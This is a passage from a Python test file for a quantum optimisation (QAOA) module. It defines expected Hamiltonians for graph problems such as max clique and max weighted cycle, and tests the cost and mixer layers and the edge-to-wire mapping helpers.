[qml.PauliZ(0) @ qml.PauliZ(2), qml.PauliZ(0), qml.PauliZ(2), qml.PauliZ(1)],
[qml.PauliZ(0) @ qml.PauliZ(2), qml.PauliZ(0), qml.PauliZ(2), qml.PauliZ(1)],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(5)]
MIXER_COEFFS = [
[0.5, 0.5, 1.0, 0.5, 0.5],
[0.5, 0.5, 1.0, 0.5, 0.5],
[1.0, 1.0, 1.0],
[1, 1, 1],
[1, 1, 1],
]
MIXER_TERMS = [
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(2),
qml.PauliX(1),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(0),
],
[
qml.PauliX(0),
qml.PauliX(0) @ qml.PauliZ(2),
qml.PauliX(1),
qml.PauliX(2),
qml.PauliX(2) @ qml.PauliZ(0),
],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
[qml.PauliX(0), qml.PauliX(1), qml.PauliX(2)],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(5)]
MAXCLIQUE = list(zip(GRAPHS, CONSTRAINED, COST_HAMILTONIANS, MIXER_HAMILTONIANS))
"""GENERATES CASES TO TEST EDGE DRIVER COST HAMILTONIAN"""
GRAPHS = GRAPHS[1:-2]
GRAPHS.append(graph)
GRAPHS.append(Graph([("b", 1), (1, 2.3)]))
GRAPHS.append(graph_rx)
b1_rx = rx.PyGraph()
b1_rx.add_nodes_from(["b", 1, 2.3])
b1_rx.add_edges_from([(0, 1, ""), (1, 2, "")])
GRAPHS.append(b1_rx)
REWARDS = [
["00"],
["00", "11"],
["00", "11", "01", "10"],
["00", "01", "10"],
["00", "11", "01", "10"],
["00", "01", "10"],
]
HAMILTONIANS = [
qml.Hamiltonian(
[-0.25, -0.25, -0.25, -0.25, -0.25, -0.25],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(1),
qml.PauliZ(2),
],
),
qml.Hamiltonian(
[-0.5, -0.5, -0.5],
[
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliZ(1) @ qml.PauliZ(2),
],
),
qml.Hamiltonian([1, 1, 1], [qml.Identity(0), qml.Identity(1), qml.Identity(2)]),
qml.Hamiltonian(
[0.25, -0.25, -0.25, 0.25, -0.25, -0.25],
[
qml.PauliZ("b") @ qml.PauliZ(1),
qml.PauliZ("b"),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2.3),
qml.PauliZ(1),
qml.PauliZ(2.3),
],
),
qml.Hamiltonian([1, 1, 1], [qml.Identity(0), qml.Identity(1), qml.Identity(2)]),
qml.Hamiltonian(
[0.25, -0.25, -0.25, 0.25, -0.25, -0.25],
[
qml.PauliZ("b") @ qml.PauliZ(1),
qml.PauliZ("b"),
qml.PauliZ(1),
qml.PauliZ(1) @ qml.PauliZ(2.3),
qml.PauliZ(1),
qml.PauliZ(2.3),
],
),
]
EDGE_DRIVER = zip(GRAPHS, REWARDS, HAMILTONIANS)
"""GENERATES THE CASES TO TEST THE MAXIMUM WEIGHTED CYCLE PROBLEM"""
digraph_complete = nx.complete_graph(3).to_directed()
complete_edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(digraph_complete.edges)}
for k, v in complete_edge_weight_data.items():
digraph_complete[k[0]][k[1]]["weight"] = v
digraph_complete_rx = rx.generators.directed_mesh_graph(3, [0, 1, 2])
complete_edge_weight_data = {
edge: (i + 1) * 0.5 for i, edge in enumerate(sorted(digraph_complete_rx.edge_list()))
}
for k, v in complete_edge_weight_data.items():
digraph_complete_rx.update_edge(k[0], k[1], {"weight": v})
DIGRAPHS = [digraph_complete] * 2
MWC_CONSTRAINED = [True, False]
COST_COEFFS = [
[
-0.6931471805599453,
0.0,
0.4054651081081644,
0.6931471805599453,
0.9162907318741551,
1.0986122886681098,
],
[
-6.693147180559945,
-6.0,
-5.594534891891835,
-5.306852819440055,
-5.083709268125845,
-4.90138771133189,
54,
12,
-12,
-6,
-6,
-12,
6,
12,
-6,
-6,
-12,
6,
12,
-6,
-6,
6,
],
]
COST_TERMS = [
[
qml.PauliZ(wires=[0]),
qml.PauliZ(wires=[1]),
qml.PauliZ(wires=[2]),
qml.PauliZ(wires=[3]),
qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[5]),
],
[
qml.PauliZ(wires=[0]),
qml.PauliZ(wires=[1]),
qml.PauliZ(wires=[2]),
qml.PauliZ(wires=[3]),
qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[5]),
qml.Identity(wires=[0]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[1]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[2]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[1]) @ qml.PauliZ(wires=[2]),
qml.PauliZ(wires=[1]) @ qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[2]) @ qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[2]) @ qml.PauliZ(wires=[3]),
qml.PauliZ(wires=[2]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[3]),
qml.PauliZ(wires=[3]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[0]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[4]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[3]) @ qml.PauliZ(wires=[4]),
qml.PauliZ(wires=[1]) @ qml.PauliZ(wires=[5]),
qml.PauliZ(wires=[1]) @ qml.PauliZ(wires=[3]),
],
]
COST_HAMILTONIANS = [qml.Hamiltonian(COST_COEFFS[i], COST_TERMS[i]) for i in range(2)]
MIXER_COEFFS = [
[
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
0.25,
0.25,
0.25,
-0.25,
],
[1] * 6,
]
MIXER_TERMS = [
[
qml.PauliX(wires=[0]) @ qml.PauliX(wires=[1]) @ qml.PauliX(wires=[5]),
qml.PauliY(wires=[0]) @ qml.PauliY(wires=[1]) @ qml.PauliX(wires=[5]),
qml.PauliY(wires=[0]) @ qml.PauliX(wires=[1]) @ qml.PauliY(wires=[5]),
qml.PauliX(wires=[0]) @ qml.PauliY(wires=[1]) @ qml.PauliY(wires=[5]),
qml.PauliX(wires=[1]) @ qml.PauliX(wires=[0]) @ qml.PauliX(wires=[3]),
qml.PauliY(wires=[1]) @ qml.PauliY(wires=[0]) @ qml.PauliX(wires=[3]),
qml.PauliY(wires=[1]) @ qml.PauliX(wires=[0]) @ qml.PauliY(wires=[3]),
qml.PauliX(wires=[1]) @ qml.PauliY(wires=[0]) @ qml.PauliY(wires=[3]),
qml.PauliX(wires=[2]) @ qml.PauliX(wires=[3]) @ qml.PauliX(wires=[4]),
qml.PauliY(wires=[2]) @ qml.PauliY(wires=[3]) @ qml.PauliX(wires=[4]),
qml.PauliY(wires=[2]) @ qml.PauliX(wires=[3]) @ qml.PauliY(wires=[4]),
qml.PauliX(wires=[2]) @ qml.PauliY(wires=[3]) @ qml.PauliY(wires=[4]),
qml.PauliX(wires=[3]) @ qml.PauliX(wires=[2]) @ qml.PauliX(wires=[1]),
qml.PauliY(wires=[3]) @ qml.PauliY(wires=[2]) @ qml.PauliX(wires=[1]),
qml.PauliY(wires=[3]) @ qml.PauliX(wires=[2]) @ qml.PauliY(wires=[1]),
qml.PauliX(wires=[3]) @ qml.PauliY(wires=[2]) @ qml.PauliY(wires=[1]),
qml.PauliX(wires=[4]) @ qml.PauliX(wires=[5]) @ qml.PauliX(wires=[2]),
qml.PauliY(wires=[4]) @ qml.PauliY(wires=[5]) @ qml.PauliX(wires=[2]),
qml.PauliY(wires=[4]) @ qml.PauliX(wires=[5]) @ qml.PauliY(wires=[2]),
qml.PauliX(wires=[4]) @ qml.PauliY(wires=[5]) @ qml.PauliY(wires=[2]),
qml.PauliX(wires=[5]) @ qml.PauliX(wires=[4]) @ qml.PauliX(wires=[0]),
qml.PauliY(wires=[5]) @ qml.PauliY(wires=[4]) @ qml.PauliX(wires=[0]),
qml.PauliY(wires=[5]) @ qml.PauliX(wires=[4]) @ qml.PauliY(wires=[0]),
qml.PauliX(wires=[5]) @ qml.PauliY(wires=[4]) @ qml.PauliY(wires=[0]),
],
[qml.PauliX(wires=i) for i in range(6)],
]
MIXER_HAMILTONIANS = [qml.Hamiltonian(MIXER_COEFFS[i], MIXER_TERMS[i]) for i in range(2)]
MAPPINGS = [qaoa.cycle.wires_to_edges(digraph_complete)] * 2
MWC = list(zip(DIGRAPHS, MWC_CONSTRAINED, COST_HAMILTONIANS, MIXER_HAMILTONIANS, MAPPINGS))
# NOTE(review): this is an exact duplicate of decompose_hamiltonian defined
# earlier in this file; the rebinding is redundant and could be removed.
def decompose_hamiltonian(hamiltonian):
    """Split a Hamiltonian into [coefficients, operator names, operator wires]."""
    coeffs = list(qml.math.toarray(hamiltonian.coeffs))
    ops = [i.name for i in hamiltonian.ops]
    wires = [i.wires for i in hamiltonian.ops]
    return [coeffs, ops, wires]
class TestCostHamiltonians:
"""Tests that the cost Hamiltonians are being generated correctly"""
"""Tests the cost Hamiltonian components"""
def test_bit_driver_error(self):
"""Tests that the bit driver Hamiltonian throws the correct error"""
with pytest.raises(ValueError, match=r"'b' must be either 0 or 1"):
qaoa.bit_driver(range(3), 2)
def test_bit_driver_output(self):
"""Tests that the bit driver Hamiltonian has the correct output"""
H = qaoa.bit_driver(range(3), 1)
hamiltonian = qml.Hamiltonian([1, 1, 1], [qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(2)])
assert decompose_hamiltonian(H) == decompose_hamiltonian(hamiltonian)
def test_edge_driver_errors(self):
"""Tests that the edge driver Hamiltonian throws the correct errors"""
with pytest.raises(
ValueError, match=r"Encountered invalid entry in 'reward', expected 2-bit bitstrings."
):
qaoa.edge_driver(g1, ["10", "11", 21, "g"])
with pytest.raises(
ValueError,
match=r"'reward' cannot contain either '10' or '01', must contain neither or both.",
):
qaoa.edge_driver(g1, ["11", "00", "01"])
with pytest.raises(ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph"):
qaoa.edge_driver([(0, 1), (1, 2)], ["00", "11"])
@pytest.mark.parametrize(("graph", "reward", "hamiltonian"), EDGE_DRIVER)
def test_edge_driver_output(self, graph, reward, hamiltonian):
"""Tests that the edge driver Hamiltonian throws the correct errors"""
H = qaoa.edge_driver(graph, reward)
assert decompose_hamiltonian(H) == decompose_hamiltonian(hamiltonian)
"""Tests the cost Hamiltonians"""
def test_max_weight_cycle_errors(self):
"""Tests that the max weight cycle Hamiltonian throws the correct errors"""
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph or rx.PyDiGraph"
):
qaoa.max_weight_cycle([(0, 1), (1, 2)])
def test_cost_graph_error(self):
"""Tests that the cost Hamiltonians throw the correct error"""
graph = [(0, 1), (1, 2)]
with pytest.raises(ValueError, match=r"Input graph must be a nx\.Graph or rx\.PyGraph"):
qaoa.maxcut(graph)
with pytest.raises(ValueError, match=r"Input graph must be a nx\.Graph or rx\.PyGraph"):
qaoa.max_independent_set(graph)
with pytest.raises(ValueError, match=r"Input graph must be a nx\.Graph or rx\.PyGraph"):
qaoa.min_vertex_cover(graph)
with pytest.raises(ValueError, match=r"Input graph must be a nx\.Graph or rx\.PyGraph"):
qaoa.max_clique(graph)
    @pytest.mark.parametrize(("graph", "cost_hamiltonian", "mixer_hamiltonian"), MAXCUT)
    def test_maxcut_output(self, graph, cost_hamiltonian, mixer_hamiltonian):
        """Tests that the output of the MaxCut method is correct"""
        cost_h, mixer_h = qaoa.maxcut(graph)
        # Compare term-by-term decompositions rather than Hamiltonian objects directly.
        assert decompose_hamiltonian(cost_hamiltonian) == decompose_hamiltonian(cost_h)
        assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
    @pytest.mark.parametrize("constrained", [True, False])
    def test_maxcut_grouping(self, constrained):
        """Tests that the grouping information of the MaxCut cost Hamiltonian is set
        and corresponds to a single mutually-commuting group.

        NOTE(review): ``constrained`` is parametrized but never used in the body —
        TODO confirm whether it should be forwarded to ``qaoa.maxcut``.
        """
        graph = MAXCUT[0][0]
        cost_h, _ = qaoa.maxcut(graph)
        # check that all observables commute
        assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
        # check that the 1-group grouping information was set
        assert cost_h.grouping_indices is not None
        assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
    @pytest.mark.parametrize(("graph", "constrained", "cost_hamiltonian", "mixer_hamiltonian"), MIS)
    def test_mis_output(self, graph, constrained, cost_hamiltonian, mixer_hamiltonian):
        """Tests that the output of the Max Independent Set method is correct"""
        cost_h, mixer_h = qaoa.max_independent_set(graph, constrained=constrained)
        assert decompose_hamiltonian(cost_hamiltonian) == decompose_hamiltonian(cost_h)
        assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
    @pytest.mark.parametrize("constrained", [True, False])
    def test_mis_grouping(self, constrained):
        """Tests that the grouping information of the Max Independent Set cost
        Hamiltonian is set and corresponds to a single mutually-commuting group.

        NOTE(review): ``constrained`` is parametrized but never used in the body —
        TODO confirm whether it should be forwarded to ``qaoa.max_independent_set``.
        """
        graph = MIS[0][0]
        cost_h, _ = qaoa.max_independent_set(graph)
        # check that all observables commute
        assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
        # check that the 1-group grouping information was set
        assert cost_h.grouping_indices is not None
        assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
    @pytest.mark.parametrize(("graph", "constrained", "cost_hamiltonian", "mixer_hamiltonian"), MVC)
    def test_mvc_output(self, graph, constrained, cost_hamiltonian, mixer_hamiltonian):
        """Tests that the output of the Min Vertex Cover method is correct"""
        cost_h, mixer_h = qaoa.min_vertex_cover(graph, constrained=constrained)
        # Compare term-by-term decompositions rather than Hamiltonian objects directly.
        assert decompose_hamiltonian(cost_hamiltonian) == decompose_hamiltonian(cost_h)
        assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
    @pytest.mark.parametrize("constrained", [True, False])
    def test_mvc_grouping(self, constrained):
        """Tests that the grouping information of the Min Vertex Cover cost
        Hamiltonian is set and corresponds to a single mutually-commuting group.

        NOTE(review): ``constrained`` is parametrized but never used in the body —
        TODO confirm whether it should be forwarded to ``qaoa.min_vertex_cover``.
        """
        graph = MVC[0][0]
        cost_h, _ = qaoa.min_vertex_cover(graph)
        # check that all observables commute
        assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
        # check that the 1-group grouping information was set
        assert cost_h.grouping_indices is not None
        assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
    @pytest.mark.parametrize(
        ("graph", "constrained", "cost_hamiltonian", "mixer_hamiltonian"), MAXCLIQUE
    )
    def test_max_clique_output(self, graph, constrained, cost_hamiltonian, mixer_hamiltonian):
        """Tests that the output of the Maximum Clique method is correct"""
        cost_h, mixer_h = qaoa.max_clique(graph, constrained=constrained)
        # Compare term-by-term decompositions rather than Hamiltonian objects directly.
        assert decompose_hamiltonian(cost_hamiltonian) == decompose_hamiltonian(cost_h)
        assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
    @pytest.mark.parametrize("constrained", [True, False])
    def test_max_clique_grouping(self, constrained):
        """Tests that the grouping information of the Maximum Clique cost
        Hamiltonian is set and corresponds to a single mutually-commuting group.

        NOTE(review): ``constrained`` is parametrized but never used in the body —
        TODO confirm whether it should be forwarded to ``qaoa.max_clique``.
        """
        graph = MAXCLIQUE[0][0]
        cost_h, _ = qaoa.max_clique(graph)
        # check that all observables commute
        assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
        # check that the 1-group grouping information was set
        assert cost_h.grouping_indices is not None
        assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
    @pytest.mark.parametrize(
        ("graph", "constrained", "cost_hamiltonian", "mixer_hamiltonian", "mapping"), MWC
    )
    def test_max_weight_cycle_output(
        self, graph, constrained, cost_hamiltonian, mixer_hamiltonian, mapping
    ):
        """Tests that the output of the maximum weighted cycle method is correct"""
        cost_h, mixer_h, m = qaoa.max_weight_cycle(graph, constrained=constrained)
        # The wire-to-edge mapping must match the expected one exactly.
        assert mapping == m
        c1, t1, w1 = decompose_hamiltonian(cost_hamiltonian)
        c2, t2, w2 = decompose_hamiltonian(cost_h)
        # There may be a very small numeric difference in the coeffs
        assert np.allclose(c1, c2)
        assert t1 == t2
        assert w1 == w2
        assert decompose_hamiltonian(mixer_hamiltonian) == decompose_hamiltonian(mixer_h)
    @pytest.mark.parametrize("constrained", [True, False])
    def test_max_weight_cycle_grouping(self, constrained):
        """Tests that the grouping information of the maximum weighted cycle cost
        Hamiltonian is set and corresponds to a single mutually-commuting group.

        NOTE(review): ``constrained`` is parametrized but never used in the body —
        TODO confirm whether it should be forwarded to ``qaoa.max_weight_cycle``.
        """
        graph = MWC[0][0]
        cost_h, _, _ = qaoa.max_weight_cycle(graph)
        # check that all observables commute
        assert all(qml.grouping.is_commuting(o, cost_h.ops[0]) for o in cost_h.ops[1:])
        # check that the 1-group grouping information was set
        assert cost_h.grouping_indices is not None
        assert cost_h.grouping_indices == [list(range(len(cost_h.ops)))]
class TestUtils:
    """Tests that the utility functions are working properly"""
    @pytest.mark.parametrize(
        ("hamiltonian", "value"),
        (
            (qml.Hamiltonian([1, 1], [qml.PauliZ(0), qml.PauliZ(1)]), True),
            (qml.Hamiltonian([1, 1], [qml.PauliX(0), qml.PauliZ(1)]), False),
            (qml.Hamiltonian([1, 1], [qml.PauliZ(0) @ qml.Identity(1), qml.PauliZ(1)]), True),
            (qml.Hamiltonian([1, 1], [qml.PauliZ(0), qml.PauliX(0) @ qml.PauliZ(1)]), False),
        ),
    )
    def test_diagonal_terms(self, hamiltonian, value):
        """Tests that ``_diagonal_terms`` correctly reports whether a Hamiltonian is
        built only from PauliZ/Identity terms (i.e. diagonal in the computational basis)."""
        assert qaoa.layers._diagonal_terms(hamiltonian) == value
class TestLayers:
    """Tests that the cost and mixer layers are being constructed properly"""
    def test_mixer_layer_errors(self):
        """Tests that the mixer layer is throwing the correct errors"""
        # A raw nested list is not a valid Hamiltonian.
        hamiltonian = [[1, 1], [1, 1]]
        with pytest.raises(ValueError, match=r"hamiltonian must be of type pennylane.Hamiltonian"):
            qaoa.mixer_layer(0.1, hamiltonian)
    def test_cost_layer_errors(self):
        """Tests that the cost layer is throwing the correct errors"""
        # A raw nested list is not a valid Hamiltonian.
        hamiltonian = [[1, 1], [1, 1]]
        with pytest.raises(ValueError, match=r"hamiltonian must be of type pennylane.Hamiltonian"):
            qaoa.cost_layer(0.1, hamiltonian)
        # Cost Hamiltonians must be diagonal: a PauliX term is rejected.
        hamiltonian = qml.Hamiltonian([1, 1], [qml.PauliZ(0), qml.PauliX(1)])
        with pytest.raises(
            ValueError,
            match=r"hamiltonian must be written only in terms of PauliZ and Identity gates",
        ):
            qaoa.cost_layer(0.1, hamiltonian)
    @pytest.mark.parametrize(
        ("mixer", "gates"),
        [
            [
                qml.Hamiltonian([1, 1], [qml.PauliX(0), qml.PauliX(1)]),
                [qml.PauliRot(2, "X", wires=[0]), qml.PauliRot(2, "X", wires=[1])],
            ],
            [
                qaoa.xy_mixer(Graph([(0, 1), (1, 2), (2, 0)])),
                [
                    qml.PauliRot(1, "XX", wires=[0, 1]),
                    qml.PauliRot(1, "YY", wires=[0, 1]),
                    qml.PauliRot(1, "XX", wires=[0, 2]),
                    qml.PauliRot(1, "YY", wires=[0, 2]),
                    qml.PauliRot(1, "XX", wires=[1, 2]),
                    qml.PauliRot(1, "YY", wires=[1, 2]),
                ],
            ],
        ],
    )
    def test_mixer_layer_output(self, mixer, gates):
        """Tests that the gates of the mixer layer are correct"""
        alpha = 1
        with qml.tape.OperationRecorder() as rec:
            qaoa.mixer_layer(alpha, mixer)
        # Expand so the recorded template is compared as primitive PauliRot gates.
        rec = rec.expand()
        for i, j in zip(rec.operations, gates):
            prep = [i.name, i.parameters, i.wires]
            target = [j.name, j.parameters, j.wires]
            assert prep == target
    @pytest.mark.parametrize(
        ("cost", "gates"),
        [
            [
                qml.Hamiltonian([1, 1], [qml.PauliZ(0), qml.PauliZ(1)]),
                [qml.PauliRot(2, "Z", wires=[0]), qml.PauliRot(2, "Z", wires=[1])],
            ],
            [
                qaoa.maxcut(Graph([(0, 1), (1, 2), (2, 0)]))[0],
                [
                    qml.PauliRot(1, "ZZ", wires=[0, 1]),
                    qml.PauliRot(1, "ZZ", wires=[0, 2]),
                    qml.PauliRot(1, "ZZ", wires=[1, 2]),
                ],
            ],
        ],
    )
    def test_cost_layer_output(self, cost, gates):
        """Tests that the gates of the cost layer is correct"""
        gamma = 1
        with qml.tape.OperationRecorder() as rec:
            qaoa.cost_layer(gamma, cost)
        # Expand so the recorded template is compared as primitive PauliRot gates.
        rec = rec.expand()
        for i, j in zip(rec.operations, gates):
            prep = [i.name, i.parameters, i.wires]
            target = [j.name, j.parameters, j.wires]
            assert prep == target
class TestIntegration:
    """Test integration of the QAOA module with PennyLane"""
    def test_module_example(self, tol):
        """Test the example in the QAOA module docstring"""
        # Defines the wires and the graph on which MaxCut is being performed
        wires = range(3)
        graph = Graph([(0, 1), (1, 2), (2, 0)])
        # Defines the QAOA cost and mixer Hamiltonians
        cost_h, mixer_h = qaoa.maxcut(graph)
        # Defines a layer of the QAOA ansatz from the cost and mixer Hamiltonians
        def qaoa_layer(gamma, alpha):
            qaoa.cost_layer(gamma, cost_h)
            qaoa.mixer_layer(alpha, mixer_h)
        # Repeatedly applies layers of the QAOA ansatz
        def circuit(params, **kwargs):
            for w in wires:
                qml.Hadamard(wires=w)
            qml.layer(qaoa_layer, 2, params[0], params[1])
        # Defines the device and the QAOA cost function
        dev = qml.device("default.qubit", wires=len(wires))
        cost_function = catch_warn_ExpvalCost(circuit, cost_h, dev)
        # Reference value computed from the docstring example.
        res = cost_function([[1, 1], [1, 1]])
        expected = -1.8260274380964299
        assert np.allclose(res, expected, atol=tol, rtol=0)
    def test_module_example_rx(self, tol):
        """Test the example in the QAOA module docstring, using a rustworkx graph."""
        # Defines the wires and the graph on which MaxCut is being performed
        wires = range(3)
        graph = rx.PyGraph()
        graph.add_nodes_from([0, 1, 2])
        graph.add_edges_from([(0, 1, ""), (1, 2, ""), (2, 0, "")])
        # Defines the QAOA cost and mixer Hamiltonians
        cost_h, mixer_h = qaoa.maxcut(graph)
        # Defines a layer of the QAOA ansatz from the cost and mixer Hamiltonians
        def qaoa_layer(gamma, alpha):
            qaoa.cost_layer(gamma, cost_h)
            qaoa.mixer_layer(alpha, mixer_h)
        # Repeatedly applies layers of the QAOA ansatz
        def circuit(params, **kwargs):
            for w in wires:
                qml.Hadamard(wires=w)
            qml.layer(qaoa_layer, 2, params[0], params[1])
        # Defines the device and the QAOA cost function
        dev = qml.device("default.qubit", wires=len(wires))
        cost_function = catch_warn_ExpvalCost(circuit, cost_h, dev)
        # Must agree with the networkx variant of this test.
        res = cost_function([[1, 1], [1, 1]])
        expected = -1.8260274380964299
        assert np.allclose(res, expected, atol=tol, rtol=0)
class TestCycles:
"""Tests that ``cycle`` module functions are behaving correctly"""
    @pytest.mark.parametrize("g", [nx.lollipop_graph(4, 1), lollipop_graph_rx(4, 1)])
    def test_edges_to_wires(self, g):
        """Test that edges_to_wires returns the correct mapping"""
        r = edges_to_wires(g)
        # Lollipop(4, 1): complete graph on {0..3} plus the tail edge (3, 4).
        assert r == {(0, 1): 0, (0, 2): 1, (0, 3): 2, (1, 2): 3, (1, 3): 4, (2, 3): 5, (3, 4): 6}
def test_edges_to_wires_error(self):
"""Test that edges_to_wires raises ValueError"""
g = [1, 1, 1, 1]
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph or rx.PyDiGraph"
):
edges_to_wires(g)
    def test_edges_to_wires_rx(self):
        """Test that edges_to_wires returns the correct mapping for a directed
        rustworkx mesh graph (both edge directions are present)."""
        g = rx.generators.directed_mesh_graph(4, [0, 1, 2, 3])
        r = edges_to_wires(g)
        assert r == {
            (0, 1): 0,
            (0, 2): 1,
            (0, 3): 2,
            (1, 0): 3,
            (1, 2): 4,
            (1, 3): 5,
            (2, 0): 6,
            (2, 1): 7,
            (2, 3): 8,
            (3, 0): 9,
            (3, 1): 10,
            (3, 2): 11,
        }
    @pytest.mark.parametrize("g", [nx.lollipop_graph(4, 1), lollipop_graph_rx(4, 1)])
    def test_wires_to_edges(self, g):
        """Test that wires_to_edges returns the correct mapping"""
        r = wires_to_edges(g)
        # Inverse of the edges_to_wires mapping for the same lollipop graph.
        assert r == {0: (0, 1), 1: (0, 2), 2: (0, 3), 3: (1, 2), 4: (1, 3), 5: (2, 3), 6: (3, 4)}
def test_wires_to_edges_error(self):
"""Test that wires_to_edges raises ValueError"""
g = [1, 1, 1, 1]
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph or rx.PyDiGraph"
):
wires_to_edges(g)
    def test_wires_to_edges_rx(self):
        """Test that wires_to_edges returns the correct mapping for a directed
        rustworkx mesh graph (both edge directions are present)."""
        g = rx.generators.directed_mesh_graph(4, [0, 1, 2, 3])
        r = wires_to_edges(g)
        assert r == {
            0: (0, 1),
            1: (0, 2),
            2: (0, 3),
            3: (1, 0),
            4: (1, 2),
            5: (1, 3),
            6: (2, 0),
            7: (2, 1),
            8: (2, 3),
            9: (3, 0),
            10: (3, 1),
            11: (3, 2),
        }
    @pytest.mark.parametrize(
        "g",
        [nx.complete_graph(4).to_directed(), rx.generators.directed_mesh_graph(4, [0, 1, 2, 3])],
    )
    def test_partial_cycle_mixer_complete(self, g):
        """Test if the _partial_cycle_mixer function returns the expected Hamiltonian for a fixed
        example"""
        edge = (0, 1)
        h = _partial_cycle_mixer(g, edge)
        ops_expected = [
            qml.PauliX(0) @ qml.PauliX(1) @ qml.PauliX(7),
            qml.PauliY(0) @ qml.PauliY(1) @ qml.PauliX(7),
            qml.PauliY(0) @ qml.PauliX(1) @ qml.PauliY(7),
            qml.PauliX(0) @ qml.PauliY(1) @ qml.PauliY(7),
            qml.PauliX(0) @ qml.PauliX(2) @ qml.PauliX(10),
            qml.PauliY(0) @ qml.PauliY(2) @ qml.PauliX(10),
            qml.PauliY(0) @ qml.PauliX(2) @ qml.PauliY(10),
            qml.PauliX(0) @ qml.PauliY(2) @ qml.PauliY(10),
        ]
        coeffs_expected = [0.25, 0.25, 0.25, -0.25, 0.25, 0.25, 0.25, -0.25]
        assert h.coeffs == coeffs_expected
        # Compare wires and names term-by-term rather than full operator equality.
        assert all(op.wires == op_e.wires for op, op_e in zip(h.ops, ops_expected))
        assert all(op.name == op_e.name for op, op_e in zip(h.ops, ops_expected))
    @pytest.mark.parametrize(
        "g",
        [nx.complete_graph(4).to_directed(), rx.generators.directed_mesh_graph(4, [0, 1, 2, 3])],
    )
    def test_partial_cycle_mixer_incomplete(self, g):
        """Test if the _partial_cycle_mixer function returns the expected Hamiltonian for a fixed
        example on an incomplete graph"""
        g.remove_edge(2, 1)  # remove an edge to make graph incomplete
        edge = (0, 1)
        h = _partial_cycle_mixer(g, edge)
        ops_expected = [
            qml.PauliX(0) @ qml.PauliX(2) @ qml.PauliX(9),
            qml.PauliY(0) @ qml.PauliY(2) @ qml.PauliX(9),
            qml.PauliY(0) @ qml.PauliX(2) @ qml.PauliY(9),
            qml.PauliX(0) @ qml.PauliY(2) @ qml.PauliY(9),
        ]
        coeffs_expected = [0.25, 0.25, 0.25, -0.25]
        assert h.coeffs == coeffs_expected
        # Compare wires and names term-by-term rather than full operator equality.
        assert all(op.wires == op_e.wires for op, op_e in zip(h.ops, ops_expected))
        assert all(op.name == op_e.name for op, op_e in zip(h.ops, ops_expected))
@pytest.mark.parametrize("g", [nx.complete_graph(4), rx.generators.mesh_graph(4, [0, 1, 2, 3])])
def test_partial_cycle_mixer_error(self, g):
"""Test if the _partial_cycle_mixer raises ValueError"""
g.remove_edge(2, 1) # remove an egde to make graph incomplete
edge = (0, 1)
# Find Hamiltonian and its matrix representation
with pytest.raises(ValueError, match="Input graph must be a nx.DiGraph or rx.PyDiGraph"):
_partial_cycle_mixer(g, edge)
@pytest.mark.parametrize(
"g",
[nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])],
)
def test_cycle_mixer(self, g):
"""Test if the cycle_mixer Hamiltonian maps valid cycles to valid cycles"""
n_nodes = 3
m = wires_to_edges(g)
n_wires = len(graph.edge_list() if isinstance(graph, rx.PyDiGraph) else graph.edges)
# Find Hamiltonian and its matrix representation
h = cycle_mixer(g)
h_matrix = np.real_if_close(matrix(h, n_wires).toarray())
# Decide which bitstrings are valid and which are invalid
valid_bitstrings_indx = []
invalid_bitstrings_indx = []
for indx, bitstring in enumerate(itertools.product([0, 1], repeat=n_wires)):
wires = [i for i, bit in enumerate(bitstring) if bit == 1]
edges = [m[wire] for wire in wires]
flows = [0 for i in range(n_nodes)]
for start, end in edges:
flows[start] += 1
flows[end] -= 1
# A bitstring is valid if the net flow is zero and we aren't the empty set or the set
